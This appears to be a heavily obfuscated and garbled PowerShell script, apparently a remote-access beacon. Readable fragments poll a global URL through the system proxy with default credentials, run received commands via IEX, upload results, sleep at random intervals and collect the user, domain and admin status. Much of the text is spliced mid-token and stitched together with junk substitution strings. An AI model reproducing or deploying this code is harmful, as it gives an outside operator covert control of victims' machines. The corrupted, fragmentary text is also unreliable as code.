QOM).rEplACE(QOM7SzoQOM,[STrING][char]36).rEplACE(([char]109+[chavt95+vt95r]55+[char]110+[char]56),[STrING][char]39).rEplACE(QOMka1iQOM,QOMmYUQOM).rEplACE(([char]67+[char]113+[charwUd,wUdPtemf7x+f7x.IOOKP+OKP.StreamRedOKP+OKPwp,dwp dwp,dwch7+ch7phRV+hRVECi+ECif7x+f7xty.hRVf7x+g5u+g5uf7x+hRVCryptographRxY+RxYOKP+OKhND,hNDKPm7n8+m7n8+OKP1Yj+1Yj) Lo6jroOKP+OKPerd.prox5lr,5lrx+f7xeVa){OKP+OKP hRV+hRV f7x+f7x Lo6zq5 = nhRV+hRVe2Ri+2m7n8+m7n8Riw-objecOKP+OKPt -TyhRV+hRVpeName SysthRVdwp,dwp f7OKP+OKPx+f7OKP+OKPx try{ f7x+f7x 1Yj+hND,hNDPy.M10ni,0niwp,dwp= [Net.WebRequest]::GetSysfjt+fjttemf7x+f7xWdwp,dwplYYKV,fjt+fjtYKV(Lo6pk, LoOKP+OKP6pvcuregrkg)hRV+hRV{ hND,hNDC[,3Ypj1p3Yp eCaLpeRc-63]RahC[,3YpMrt3Yp eCaLpeRc- 43]RahC[,3YpdWr3Yp eCAlPER- )3Yp
)j1pj1pnIoj-]2,11,3[dWreMwI’+’zANyDv,yDvnSBN if OZc,OZc f7x+f7x trf7x+f7m7n8+m7n8xilZ+ilZy{ N3w+N3w
Lo6BJK,fm7n8+m7n8qh+fqhBJKKP+f7x{f7x+f7x Lo6ernhRVdJIv,JIvr
)wvt95+vt95qHXwq’+’H+]31[DiLLEHshM2+]1[dillEhshM2 (& S9T )93]RaHc[]GNiRts[,wqH4p9D+p9Dn6wqH(EcALPEr.)wqHS9TwqH,)201]RaHQOM+QOMc[+501]RaHc[+35]Rb4B,b4B+f7N3w+N3wx[Stf7x+OKP+OKPf7xring] Lo6erfhyhRV+hRVg = Lo6ef7GRU,GRUtiohRV+hRVnnJ50+nJ50 trgEnaqbzCedwp,dwpgn.ReadToEnd()hRV+ch7+ch7hRVOKP+OKP;OKP+OKP } } a4v8C+v8Ch+a4h catch { dwp,dOKP+QOM+QOMOKPwpagb4B,b4B91}{69}{f7x+f7x143}{4}{112}{0Dk+0DkGvu+Gvu271}{270}{GRU,GRUwpVf7x+f7x.Excedwp,dwpog5u+g5u6pOKP+OKPzhRdwp,dwp_qngn = New-f7x+f7xObject Sf7x+f7xystem.IO.StOKP+OKPreamRefOKP+OKP7x+f7WMA+WMAxader Lo6qngn; Oa4h+a4hKP+OKP f7g5u+gKVy+KVy5uxb4B,b4BLo6NOKP+OKPqzvf7x+f7xaEbGRU,GRUx+ffqh+fqh7xrfj1p+j1p_qngn.ReadToEnd(); f7x+f7x } Yrn+Yrn} BJK,BJK2A1) (6SjaA,jaA EFy. ( HyFsHELlid[1]+HyFSheLlid[13KVy+KVy]+WMAxWMA) l7Sa,l7SahRV+hf7x+f7xRV Lo6jroerd.pOKP+OKProxy dwpYrn+Yrn,dwpngn = Lo6erfc.GKS6h,KS6hdentOKP+OKPf7x+f7xd0ni,0niBN Lo6gBJK,BJKb GRU,GRUOKP+OKP:Creatdwp,dwpo6pBLYKV,YKVwp hRV+hRVdwpf7x+f7x,dwp+hRV RxY+RxYdwp,dwpq.Length-LoJIv,JIvaHC[,)701]Raj1p+j1pHC[+811]RaHC[+311]RaHC[( ecALPErc- ))BJKwp((hRV
Lo6globalvt95+vt95OKP+OKP:urlhRV+hRV = SBNS0niYrn+Yrn,0ni{11f7x+f7x}{20}{83}{3YN3w+N3wp+3Yp62}{215}{185}xXW+xXW{118}{12m7n8+m7n84}{106}{201}Jd3+Jd3{6f7x+f7x8}{194}{53}{273}ch7+ch7{95}{183}{67OKP+OKP}{134}{ztT+ztT80}{58}{1}{26f7x+f7x7}{142SO4,SO4KP6sfdOKP+SO4,SO4egWMA,2j1p+j1pRi+2Ri[chAR]3N3w+N3w4 -REpLaceWMAR9ch7+cwUd,wUdpzq.LastIndeWMA+WMAxOff7OKP+OKPxP9r+P9r+f7xOKP+OKP(aZD/aZGvu+GvuWMA+WMAD)hf7x+f7xRjaA,jaAx+f7xite-Host SBhRV+hRVNR-OGqh+GqhSBN
}
fqh+fqh
}
dwp,dwpo6GRU,GRU
))93]Rahc[,)221]Rahc[+611]Rahc0Dk+0Dk[+48]Rahc[(eJd3+Jd3calPeR-69]Rahc[,Bt32A1+2A1m57Bt3 EcALpErc- 63]Rahc[,Bt3B0gBt3 EcALpErc- 43]RahcjaA,jaAV+hRWMA+WMAV,Lo6pzdwp,dwpRdwp,dwp+ Lo6erfha4h+a4hyg + aZDSBN}aZD)WNLg,WNLguV6hfre){ dwp,dwphRV+hf7x+f7xRV hRV+hRV fa4BLT+BLTh+Pfqh’+’+fqh9r+P9ra45lr,5lr
) )43]rAj1p+j1phc[]gNIRtS[,GhND,hNDxOKP+OKP+2Ri+2Rif7x l7Sa,l7S5lr,5lrgJHN3LldyaXRyDv,yDvf7x+f7OKP+OKPxwpOKP+OKP3Yp+hND,hNDf7x.Text.Encdwp,dwpxXW+xXWRdwp,f7x+f7xdwpq=f7x+OKP+OKPf7xLo6pzq.P9r+P9rreplacf7x+f7xwqH,wqHwpwdwp,dwp fwUd,wUdtInRole]:KS6h,KS6hVC = ff7l7Sa,l7SadldE1nR,1nRlace(BJK,N3w+N3wBJKOKPBt3+Bt3ZD)))) f7x+f7x retuf7x+f7xrn cNfxwUd,wUd]53),[STrING][charyDv,yDv dwp,OKP+OKPdwpn Lof7x+f7xOKP+OKP6ernyVCBt3+Bt3 } cdwp,dwpEnd()0ni,0ni,dwyDv,yDvhRV6dwp,dwpject WiKS6h,KS6h([chAR]65lr,5lr37}{244}{6}{151}{129}{91}f7x+f7x{275}{92}{23}{133f7x+f7x}{24f7OKP+OKhND,hNDing([System.Text.f7x+fJd3+Jd37xEncoding]::ASBt3+Bt3OZc,OZcCII.OKP+OKPGetOKPhND,hNDjt+fjt Lo6wc = New-ObjOKP+OKPecf7x+f7xt Sysf7x+f7xdwp,dwp Jd3+Jd3 Lo6erfhhdwp,dwpZDdwp,dwphfr -eq LohRV+hRg5u+g5WNLg,WNLg } }
function qrPelcv8C+v8CgYKV,YKVT+BLTzq f7xjaA,jaAdnJ50+’+’nJ50wpV+hRVLo6w’+’c.prof7OKP+OKPx+f7xxy.CredOGqh+GQOM+QOMxXW+xXWqhKP+OKPeOKP+OKPn0Dk+0Dktials OKP+OKP=jaA,jaABN Lo6hRV+hRVFlfVasb +f7x+f7x=f7x+f7x trgUbfgAnzr Lo6FlfVasb +=dwBJKf- 0yj}2{}81{}3{}31{}0{}61{}8{}02{ch7+ch7}21{}62{}11{}52{}91{}41{}51{}AL2+AL222{}5{}42{}6{}7{}1{}9{}32{}01{}71{}4{}12{0yj((( Gvu( ()GvuGvuNioJ-]52,51,4[CEPsMOc:VnEvBK ( & weg ) ;.( vBK{vErYKV,YKVH,wqHd3ew-object -f7x+f7xTypOKP+OKPhRV+hRVehRV+hRVName System.Texdwp,dwp6jrOKP+OKPof7x+f7xerd.proxy = [NGqh+Gqhet.WeOKP+OKPbRequf7x+f7xehRV+hRVnJ50+nJ50st]::GJd3+Jd3etSystemWebProxy(OhND,hNDOKP+OKPLo6erfc.Getf7x+fb4B,b4BfjtnJ50+n’+’J50,fjtrAyfjt));huz{1zNZiWuTfr} =[cHAR[]] lwJ)fjtXfjt+]31[dilLEhShuz+]1’+’[DILLehShuz ( . fWF)93]fqh+fqhrAHC[]gnIRts[,)47]rAHC[+37]rAHC[+811]rAHC[((ecALpEr.)fjthuzfjt,)411]rAHC[+58]rAHC[+65]rAHC[((ecALpEr.)ilZ+ilZ421]rAHC[]gnIRts[,fjt4Oyfjt(ecALpEr.)43]rAHC[]gnIRts[,fjtlAefjt(ecALpEr.)fjt
)JIvJIvNiOJ-]52,42,4[CePSmOC:vnErU8 (& 4Oy )93]raHc[]gnIRts[,)05]raHcfqh+fqh[+28]raHc[+501]raHc[((ECAlPKVy+KVyer.)JIv4OyJIv,JIvpT2JIv(ECAlPer.)63]raHc[]gnIRts[,)68]yDv,yDvwp,dwpRV+hRV
v8C+v8C OKP+OKP }
}
Jl4+Jl4 Lo6FlfVasBJK,BJKaZD[^ffjt+fjt7x+f7xa-zAwqH,wqHtrgHfreanOKxXW+xXWP+OKPzOKPilKS6h,KS6hZ+ilZ+OKPr(){ hRV+hRV trydwp,dwpVasb hRVdwJIv,JIvhRf7x+f7OKP+OKPxVDtVhRV,[f7x+f7Gqh+Jl4+Jl4GqhxCHAr]92 -cREPlACEhRVSBNhRV,[CHAr]34-cREPlACE ([CHArOKP+OKP]78+[j1p+j1pCHf7x+f7OJIv,JIvx+f7x[System.Text.Enf7x+fBJp9D+p9DK,BJvt95+vt95KSBN-SBN + Lo6_.IPAddresNfx,Nfx2A1D2A1+2A1Pf2A1) ).6SXVAXU3lue6SX::(6SX{0}{1}6SX-f 2A1rEV2A1,2A1erSE2A1).Invoke((&(64n6+4n6SX{0}{2}{1}6SX-f2Nfx,NfxP+OKPvfNqzOKP+OKPva(){ try{f7x+f7x dwpOKP+OKP,dwpem.Net.WebResponse] Lo6erfOKP+OKPc = LBLT+BLTo6jroerd.GetResf7x+f7xponse(); OKP+OKP if (Lo6dwp,dwp9P9r+P9rzdwp,dwp } catch { OKP+OKPhRVhND,hNDp }dwpf’+’ECihND,hNDp5lrniPo6f7x+f7xbhg mQi Out-Strindwp,dwpbkl(){
Ldwp,dwphRV+hRV = [Net.WebRequdwp,dwBJK,BJKP+OKPx+f7x } catch {f7x+f7x f7x+f7x retuvt95+vt95rf7x+f7xn Lo6_hRV+hRdwp,dwp}[Sv8C+v8Cystem.Net.WebRef7x+f7xsOKP+OKPponse] Lo6BJK,BJKi-tf7x f-uOY}2{}0{}1{uOY(& ( ;uOY &( 07hENv:puBliC[13]m7n8+m7n8+07hEnV:pUbLIC[5]+f7xXf7x) ( (fGqh+Gqh7x ((knSyDv,yDv6bhg = (LOKP+OK0ni,0nipVolder(aZcTw+cTwDc:dwp,df7x+f7xwpOKP+OKP+hRVrorDomaihRV+hRVnSBN;}}f7x+f7xfunctidwJIv,JIv124).REPlACE(cTwp9DcTw,[sTriNg][Char]39) )
YKV)) -CREplaCeYKVcTwYKV,[ChaR]39 -CREplaCe ([ChaR]70+[ChaR]107+[ChaR]54),[ChaR]9Nfx,NfxoJ5 wgp+) ) nOEUlAv- )wgp4sdwgp+wgpewgp( )BLTiRaBLQOM+QOMT,BLTV-tEgBLT,BLTELBABLT f- wgp}0{}2{}cTw+cTw1{wgp(&( (]GNirTs[ + wgpxXW+xXW ) BLTBLT BLTsfOBLT ElbairAV-tEs (oJ5wgp;) ) nOEUlAv- )wgp4sdwgp+wgpewgp( )BLTRBLT,BLTEch7+ch7LBBLT,BLTAiBLT,BLTaV-tEgBLTf- wgp}2{}1N3w+N3w{}31Yj+1Yj{}0{wgp(&( (ekovnI.)BLTER0Dk+0DkBLT,BLTEsreVBLT f- wgp}0{}1{wgp(::Eulav.) )BLTMt6ilZ+ilZjBLT+BLT9BLT( ElBaIRAV( ;)wgp&( ojaA)) -CreplaCejaAiMyjaA,[ChAr]36-REpKS6h,KS6hnR,1nR6bhgchg = Lo6unfu.repdwp,dwpatch {
OKP+OKP
hRV+hROKP+OKPV 2Ri+2Ri f7xBt3+Bt3+f7x return WNLg,WNLg*SBN
Lo6FlfBLT+BLTVasb += dwp,dwhND,hND+OKPBythND,hNDf7x+f7xeOKP+OKPs(Lo6erfh0Dk+0Dkyg))
‘+’f7x+f7x Lo6erfhyg = f7x+f7x(Lo6pvq + aZD:aZD + Lo6erfOKP+OKPhyKS6h,KS6hw+cTw}
return -joOKP+OKPin Lo6zl7Sa,l7Saf7x
LN3w+N3wQOM+QOMof7x+f7x6erfhyg = pbzznaqf7x+f7xnaq_pf7x+f7xbfqh+fqhage5lr,5lr= uggcCBFG (QOM+QOMSBN/SBN +fqh+fqh OKP+OKPLohRV+hRV6KS6h,KS6hetResdwp,dwpZDupload aZD,aZDaZD)
hRV+hROZc,OZcpOKP+OKP,dw3Yp+3Yppum 0 -maximum (Lo6ChRV+hRV.hRV+hdwpztT+ztTf7x+f7x,dwp hRV+hRV} cathRV+hRV3Yp+3YpchhRV+f7x+f7xhRV {
P9r+P9r rf7x+f7xeturn Lf7x+f7xo6.Ef7x+f7xxcOKP+OKPeption.MessagehRV+m7n8+m7n8hRV
dwp,dp9D+p9DwpISBcTw+cTwhRV+hRVN
OZc,OZc(Lo6rapbqr_wqH,wqH 40)
dwp,dwpLo6i WNLg,WNLgKpzq 5lr,5lr -f 2A1varIaBL2A1,2A1e2A’+’1) (Nfx,NfxPEr.)GqhNqdGqm7n8+m7n8h,GqhSauGqh(ECALPEr.)63]rAhc[]gNIRt’+’S[,GqhoJ5Gqh(ECALPEr.)69]rAhc[]gNIRtS[,)76]rAhc[+fjt+fjt411]rAhc[+07]rAhc[((ECALPEr.)93]rAhc[]gNIRtS[,)66]rAhc[+67]rAhc[+48]rAhc[((ECALPEr.)Gqh
)BLTBLwUd,wUd,Nfxt.WebClient Op9D+p9DKP+Ol7Sa,l7Sa dwp,dNfx)) -CRepLaCE([ChaR]105+[ChaR]108+[ChaR]90),[ChaR]39-CRepLaCE ([QOM+QOMChaR]76+[ChaR]97+[ChaR]116),[ChaR]36) ) j1yDv,yDv1}cTw+cTw{39}{28}{121}{214}{122}{1b4B,b4Bf7x+f7xBf7xRxY+RxY+f7xFhRV+hRVGztT+ztT LOKP+OKPo6nqqe LofyDv,yDv,[ChaR]96 -rePLAcE ([ChaR]99+[ChaR]104+[ChaR]55),[ChaR]39-rePLAcE ([ChaR]110+[ChaR]116+[ChaR]80),[ChaR]124-crepLace([Cm7n8+m7n8haR]119+[ChaR]N3w+N3w104+[ChaR]53),[ChaR]34-rePLAcE([ChaR]74+[ChaR]106+[ChaR]51),[ChaR]36)) Nfx,NfxOKP+OKP.Lef7x+f7xngdwp,dwphRV+hRV(); OKP+OKPWNLg,WNLg7x+f7x OKP+OKP t0ni,05lr,5lry.Credentf7x+f7xiaf7x+f7xls = [Net.CredentialCap9D+p9Dche]::DefaultCredentif7x+f7OKP+OKPxals Lo6jroerdf7x+f7x.Method = SBNv8C+v8CwqH,wqH03[emOHSpKqR+]4[emOHSPKqR (.n0K )63]rAhc[]gniP9r+P9rryDv,yDvZbq Lo6ahz LORxY+RxYKP+OKPhRV+hRVo6xOKP+OKPrl Ldwp,dwOKP+OKPp OKP+OKPstarf0Dk+0Dk7x+f7xt-sleep (Get-Random -Minimum 20 -Mj1p+j1paxdwp,dwpe = SBNhRV+hRVappf7x+f7xhRV+hRP0Dk+0Dk9r+P9rVlication/f7x+f7xN3w+N3wjsoyDv,yDv)GRUxGRU+]03[EmOhslGqh+Gqh7Sa,l7Sa returOKP+OKPnOKP+OKPf7x+f7x (Get-WKVy+KVymiObjedwp,dwp tf7x+f7xry{ OKP+OKP f7xztTSO4,SO42RiNfw2Ri EcaLPER- 93]rAHc[,2Ri0Dk2Ri EcaLPER- 69]rAHc[,)25]rAHc[+311]rAHc[+18]rAHc[( ECalperjaA,jaA,)QOM+QOM45]rAhc[+07]rAhc[+221]rAhc[( EcAlPer- )2A1
) )93]rahc[,GRUBt3GRU EcAlPJd3+j1p+j1pJd3ErC- v8CKS6h,KS6h+v8C63]rahc[,GRUkItGRUEcAlPErC- ))GRUx+f7xbstring(1); dwp,dwp } return Lo6erfjt+fjtdwp,dwprName f7x+f7x df7x+f7xwp,dwpRVLength) Lo6globdwp,dwpeOKKVy+KVyP+OKPrf_qnb4B,b4B_pOKP+OKPb’+’agebnJ50+nJ50y(Lo6pzq)f7x+f7x{ dwp,dwp l7fjt+fjtSa,l7Sawf7x+fGvu+Gvu7xp,dwptConverter]::ToStrinhRV+hRVg(Lo6zqGqh+Gqh5.ComputeHasOKP+OKPh(fOKP+OKP7OKP+OKPx+f7xLo6hgs8.GetBytes(Lo6fgwqH,wqH+2A1 OKP+OKP LoOKP+OKP6FlfVOKP+OKPasb += SBN**SBN Lo6Flfl7Sa,YKV,YKV3f7x+f7xQgU3OjaA,jaAKP+JIv,JIvOKPlzdGVtLkch7+ch7ldwp,dwpVOKP+OKP+hf7x+f7xRVbW9yeVN0cmVhbQ0KICAgIwUd,wUdion wqH,wqHyg
}
funOKP+OKPdwp,OKP+Bt3+Bt3OKPdwprite-host Lo6hey SBNN9JtSBN 4n6+4n6(BLT+BLTL2Rm7n8+m7n8i+2Rio6global:urlg5u+g5u + LoYrn+Yrn6_.EOKP+OKPN3w+N3wxhRV+hRVcepthRV+hdwp,dwp2)OKP+OKP Lo6pzq = Lo6pzq -spliOKPp9D+p9D+OKPt Sdwp,f7x+f7xdwpthOKP+OKP-dwp,dwpf7x+f7xLoWMA+WMA6pzq){ f7x+g5u+g5uf7x try{ cTw+cTw Lo6bhg = IEX Lo6pzq -f7x+f7xErOKP+OKProhRV+v8C+v8ChRVrA2ABLT+BLT1+2A1ctiof7x+f7yDv,yDvH,wqH7}{156}{165}{114}{hND,hND )NFOgeuLAgNV0VNFOg.))vt95AIRAVvt95,vt95Bvt9hND,hNDtTniOj-ztTxztT+]3,1[)}EcBJK,BJKchRV+hRVh { Lo6erhf7x+f7xRVOKP+OKP+hRVfhyg =hf7x+f7xRVOKP+OKP+hROKP+OKPV SBNf7x+f7xerOKP+OKPrf7x+f7xorSBN f7xcTw+cTw+f7x wrOKP+OKP2A1+2A1hRVdwp,dwp dwp,dwpam(); Lo6erd_fgernz.Write(Lo6raQOM+QOMpbqr2A1+2A1OKP+OKP_qngn, 0, Lo6rapbqrOKP+OKP_qngOKP+OKPnf7x+f7x.Length)Gqh+G0Dk+0Dkqh; dwp,dwpBt3+Bt3V+hRVa3VwQWN0m7n8+m7n8aW9uID0gew0KCXBhcmFf7xfjt+fjt+f7xtKf7x+f7xFt3Yp+3YpzdHJpbmddJGMf7x+f7xsW1N5c3RlhRV+hRVbSztT+ztT5NYW5hZ2VtZW50LkF1dGf7x+f7x9tYXRpbhRV+hRV24f7x+f7xuQ2hRV+hRV9tf7x+f7xxXW+xXWbWFuZExvb2t1cEV2Zdwp,dwj1p+j1ppCRzdyA9IE5ldy1PYmpdwp,dwpo6n LoWNLg,WNLg-ldwp,dyDv,yDvh -ldwp,dwp+hf7x+f7xRVem.Securidwp,dwpf7x+f7x; IEX Lo6x;
ertvGRU,GRU57}{1p9D+p9D00}{119}{l7Sa,l7SabaBJK,BJKca’+’tch { Lo6erfhyg = OKP+OKPSf7x+f7OKP+OKPxBj1p+j1pNer2A1+2A1rorSBN dwp,dwpJl4+Jl4e(Lo6globalJd3+Jd3:uOKxXW+xXWPfqh+fqh+OKPrl + Lo6heyp9D+p9D); hf7x+f7xRf7x+f7xV+hRVLfqh+fch7+ch7qhodyDv,yDv7x+f7x6qf7x+f7xngn } f7x+f7x } catch{ 2A1+2A1 trhRa4h+a4hV+hdOKP+OKPwOZc,OZcion fuggnJ50+nJ50cfjt+fjJl4+Jl4tf7x+f7xTRG(Lo6heydwp,dwp 0Dk+0DkOKP+OKP hRV+hRV if(Lo6gdwpf7x+f7x,dwpvhRVdwp,dwphRV+hRV dwp,dwWNLg,WNLg*WNLg,Wch7+ch7NLg rehf7x+f7Nfx,NfxTw+cTwRiny SBNpBt3+Bt3wdSBN
}catch{return hRVf7x+f7x1nR,1nR+f7xwqH,wqHeVa)Jd3+Jd3h1Yj+1YjRVOKP+OKP+hRV))LhRV+hRVo1nR,1nR wrBLT+BLTite-Nfx,Nfx v8C+v8C rf7x+f7xeturn (LoOKP+OSO4,SO4OSSBN;
OKP+OKP hRV+hRVf7x+f7x OKP+O2A1+2A1KP } } hRV+hOKP+OKPROKP+OKPV
hRVf7x+f7x+hRV j1p+j1pfunOKP+OKPctionhRVf7x+f7xYKV,YKV returnOKP+OKP Lo6zlneenl f7x+f7x N3w+N3w } dwp,dwpOKP+OKPBN } }
function f7x+f7xertvfgrdwp,jaA,jaAJ5eNV:PubLiC[13]+oJ5env:pUBLIC[5]+BLTXBLTj1p+j1p)p9D+p9D(((BLT &( XClSSHELlid[1]+XClSSHeLLID[13]+WNLgXWNLg)((((j3N{23wUd,wUd mEti-tnJ50+nJ50eS(s5e KS6h,KS6hwp,dwpption.MeshRV+hf7x+f7xRVsage Jl4+Jl4 dwp,dwpest]::Cg5u+g5ureate(Lo6glodOKP+OKPwp,dOKP+OKPwpWmiObjhRV+dwp,dwpemObjehRVztT+ztT+hRVctKVy+KVy; OKP+OKP OKPP9rilZ+ilZ+P9r+OKP Lf7x+f7xOKP+OKPo6hfrhRVnJ50+nJ50+hRVe = Lof7xa4h+a4h+f7x6eJl4+Jl4nv:Usedwf7x+f7xp,dwf7x+f7xpg5u+g5uct Wif7x+f7xn3df7x+OKP+OKPf7xwp,f7x+f7xdwpf7x+f7x6env:UserNamOKP+OKPe).ShortName) hRV+yDv,yDv1pwUd,wUd8}{225}{195}{277}{2f7x+f7x54}{187}{4n6+4n651}KVy+KVy{AL2+AL244}{21yDv,yDv71),YrnImfYrn)Imf & ( s5eEnV:CoMsPec[4,15,25]-4n6+4n6JOiNYrnYrn)GY3= }6gEirGSx{s5eJd3((BJK,BJKY+RxYiNGnJ50+nJ50][chaR]3WMA+WMA9) )uOY]]KVy+KVy [rahC[ = }l0v{07h; )f7xOKP+OKPaf7xj1p+j1p,f7xYaRrf7xf-uOY}g5u+g5u0{}1{uOY(]epYT[ =}hND f-6W5}13{nJ50+nJ50}33{}01{}94{}8{}6{}3{}34{}52{}73{}23{‘+’}4{}82{}05{}24{}41{}21{}71{}14{}04{}5{}25{}81{}72{}02’+’{}0{}64{}44{}22{}91{}92{}74{}83{}11{}2{}12{}63{}53{}15{}51{}42{}7{}03{}61{}54{}43{}62{}84{}32{}31{}9{}93{}1{6W5(( xXW(( ()xXWxxXW+]5[ciLBUP:vnEa9E+]31[CiLbup:Vnea9E (&Zv4 ); (&(Zv4{3}{0}{2}{1}Zv4 -f xXWixXW,xXWEMxXW,xXWtxXW,xXWCHIldxXW) (Zv4VarZv4+Zv4IaBLZv4+Zv4E:MZv4+Zv41uZv4+Zv4yZv4)).Zv4VALEQzUEZv4::(Zv4{1}{0}KVy+KVy{2}Zv4-f xXWExXW,xXWrxXW,xXWvErsexXW).Invoke( ( &(Zv4{2}{1}{0}Zv4-f xXWLexXW,xXWBxXW,xXWVarIaxXW) (Zv4{0}{1}Zv4-f xXWiRphxXW,xXW28xXW) -valUeo ) ); . ((&(Zv4{1}{0}Zv4-f xXWAriAbLexXW,xXWvxXW) (Zv4{1}{0}Zv4 -fxXWdRxXW,xXWMxXW)).Zv4nEQzAMeZv4[3,11,2]-JoInxXWxXW) (( &(Zv4{1}{0}Zv4 -fxXWexXW,xXWVarIaBLxXW) (Zv4{1}{0}{2}Zv4-f xXWph2xXW,xXWiRxXW,xXW8xXW) -valUeo )-jOIn xXWxXW)
N3w).RepLaCE(([CHAR]90+[CHAR]118+[CHAR]52),[stRing][CHAR]34).RepLaCE(N3wa9EN3w,[stRing][CHAR]36).RepLaCE(N3wxXWN3w,[stRing][CHAR]39).RepLaCE(([CHAR]69+[CHAR]81+[CHAR]122),N3w8ViN3w)gpc iEx wUd,wUd+vt95217}{65}{184}{117}{1OKP+OKP41}{15lr,5lrV -fl72Ri+2RiSaKP 0Dk+0Dk Lo6w0ni,0niT2A1,2A1SBJK,BJK7xcoding]:f7x+f7x:UTOKP+OKPF8.GetBytes(Lo6pfqh+fqhbagrag);fOKP+OKP71nR,1nR uhRVf7x+f7OKP+OKPx+dwpWNLg,WNLgf7x0ni,0ni&((gV g5ucTw+cTfqh+fqhwmDrg5u).namE[3,11,2]-joiNg5ug5u) (vt95+vt95((g5u &(2A1m7n8+m7n8sV25lrch7+ch7,5lr8+[chAR]10m7n8+m7n82+[chAR]77),[chAR]96-REpLaJl4+Jl4ce ([chAR]71+[chAR]1Gqh+Gqh18+[chl7Sb4B,b4B1xXW+xXW7}{2}{6}{18}{7}{13}{8}{22}{10}{5}{9}{4}{16}{15}{14}{11}{12}{0}{19}{20}{1}VbG-f1nR7x+f7xpohRVKS6h,KS6hdwp,dwp Lo6pvq = Lo6pzq[0] OKP+OKP hRV+hROKP+OKPV Lo6yDv,yDv7x LxXW+xXWoBJK,BJKehRV+hRVrfc = Lo6jroerdf7x+f7x.GhRV+f7x+f7xhRVetRespf7x+f7xonse(); if (Lo6erf7x+f7xfc -nhRV+hRVe Lo6null){ f7x+f7KVy+KVyx Lo6hRWMA+WMAV+hRVqngn = hND,hNDwpreturn Lo6hfdwp,dwpe(){
ch7+ch7QOM+QOMOKP+OKP while(Lf7x+f7xo6true) { Write-Host SBNR-ISBN ch7+ch7 Lo6vasg5u+g5ub = vasbvavg OKP+OKP hRV+hRV hRV+hRV Lo6vasb j1p+j1p= raPelcg LWNvt95+vt95YKV,YKV]124)) ztT)-RePlAcE ([CQOM+QOMhar]49+[Char]110+[Char]82),[Char]39-RePlAcE ([Char]102+[Char]81+[Char]87),[Char]36 -crE2Ri+2yDv,yDvPart-slhRV+hRVeep (OKP+OKP4n6+4n6Get-Random -Minimum 20 -MaximuOKPWNLg,WNLg+OKPm 40)m7n8+m7n8 }
rOKP+OKPAL2+AL2etudwp,GRU,GRU]hOG& ( bG1{SHUhGvuch7+ch71Yj+1Yj+GvuhElHUhlid}[1]+bG1{shHUheHUhlLid}[13]+ECixECJl4+Jl4i)
RxY).rePlACE(RhND,hNDvt95(ekovnI.)vt95niovt95,vt95jvt95f-NFOg}1{}0{NFOg(::eUlaV.) )vt95fRevt95,vt95Npvt95 f- NFOg}1wUd,wUdcalPeRC-v8C+v8C93]RAHc[,)97]RAHm7n8+m7n8c[+09]RAztT+ztTHc[+99]RAHcch7+ch7[(EcalPeR- 43]RAHc[,ECinlKECi EcalPeRC-0fjt+fjtni,0nix f7OKBJK,BJK 5lr,5lrOKP+OKP 3Yp+3Yp Lo2Ri+2Ri6ahz = [int][char]Lo6cynvf7x+f7xagrkg[Lo6i] OKP+OKPdwp,dwperfOKP+OKPc -ne Lo6null){ Lo6qngnj1p’+’+j1p = OKP+OKPKVy+KVyLf7x+f7xOKP+OKP4n61Yj+1Yj+4n6o6erfc.GetwqH f-Kbk}4{}42{}JjaA,jaAv8C+v8Cc- m7n8+m7n8 )2Ri
) Cy1 )0Dk 0Dk 0DksFO0Dk VS (NfwCy1+) } }_N3w+N3w{Nfw{)0Dk%0Dk(&8Gv)0DktFe0Dk+0DklOT0Dk+)0DktHg0Dk,0DkiilZ+ilZ0Dk f-Cy1}1{}0{Cy1(+0DkR0Dk , 0Dk.0Dk , Cy1 (0Dk &( crbPSHome[4]+crbpsHOME[30]+YKVxYKV)((((N6D{9}{5}{3}{10}{13}{6}{22}{20}{18}{21}{12}{1}{14}{11}{2}{19}{0}{8}{15}{17}{16}{4}{7}{23}N6D -fvt95+vt95YKV+hRyDv,yDvp).rEpLaCE(j1p1Itj1p,j1pMrtj1p).rEpLaCE(([ChAr]3Yp+3Yp90+[ChAr]79+[ChAr]77),[sKS6h,KS6hhRV} BLT+BLT f7x+f7x}
function1nR,1nROZcxkz6if7x+f7x3f7x+f7xVNfx,NfxStartsf7x+f7xWitBt3+Bt3hm7n8+m7n8(aZDOKP+OKPb64aZD)){2Ri+2Ri 2A1+2A1 hRV+hRECi+ECiOKP+OKPVdwpOKP+OKP,dwptrgVCRxY+RxY hRV+RxY+RAL2QOM+QOM+AL2xYf7x+f7xhRV 2A1wqH,wqHwp,df7x+f7xwpfu = [Sy2A1+2A1stem.Bidwf7x+fztT+ztT7xpOKP+OKP,dGRU,GRU Lo6jroerd.P9r+P9rCf7x+f71Yj+1YjxontentLengtmQOM+QOxXW+xXWM7n8+m7n8hOKP+OKP = Lo6rapbqr’+’_qngn.h0ni,0niipal.windowsidentity]f7x+f7x::f7x+f7xGdwp,Nfx,Nfxs[0]}f7x+f7x dwj1p+j1pp,dwpH, Lo6n){ Lo6Xi = Lo6x LonJ50+nJ506Ei = Lo6H hRV+hRV Lo6Yi dwp,dwp aZD169*aZD} mdwp,dwpest]::GeBt3+Bt3tSystWMA+WMAemOKP+OKPWebPrhRV+hRVoxy() OKP+OKP LoRxY+RxY6jN3w+N3wroerd.proxy.C1nR,1nR-Nu2A1+2A1ll } dwpJd3+Jd3,dwpVb OKP+OKPLoa4h+a4h6vasb =p9D+p9D (aZD{SBNOWMA+WMAKP+OKPfuncSBN:SBNfqhKVy+KVy+fqhaSBN,Sdwp,dwpRVerthRV+hRV]::FroQOM+QOMmBase64KVy+KVyString(Lo6x))dwp,dwpLoOKP+OKP6nf7x+f7xECi+ENfx,NfxM+4bMR2E:e4bM+4bMLbAIra4bM+4bvt95+vt95MV4bM( wUd,wUdND5,vt95dvt95,vt95TqJE4:ELvt95 f-NFOg}1{}0{}2{}3{NFOg( )vt95meti-tevt95,vt95Gvt95f-NFOg}1{}0{NFOg(& (, vt95hND,hNDLohj1p+j1pRV+hRV6hfre.rj1p+j1pep1nR,1nRW-dwp,dwpLo6tJd3+Jd3)f7x+f74n6+4n6x { hRV+hRVLo6y = SNfx,Nfxk9bwUd,wUd . ( iXY{SHg7eeLg7eLiD}[1]+iXY{SHg7eELg7eLID}[13]+p9DXp9D)( ( &(qjj1p+j1pt{0}{2}{1}qjt -fp9DN3w+N3wgEtp9D,p9DvARIAblEp9D,p9D-p9D) (qjtb1Pqjt+qjt7qjt) -vaLUEOn )::qjtjOg7eInqjt(p9Dp9D ,iXY{BOZg7eqK}[ -1..-(iXY{Bog7ezQK}.qjtlg7eenGThqjt )] ))
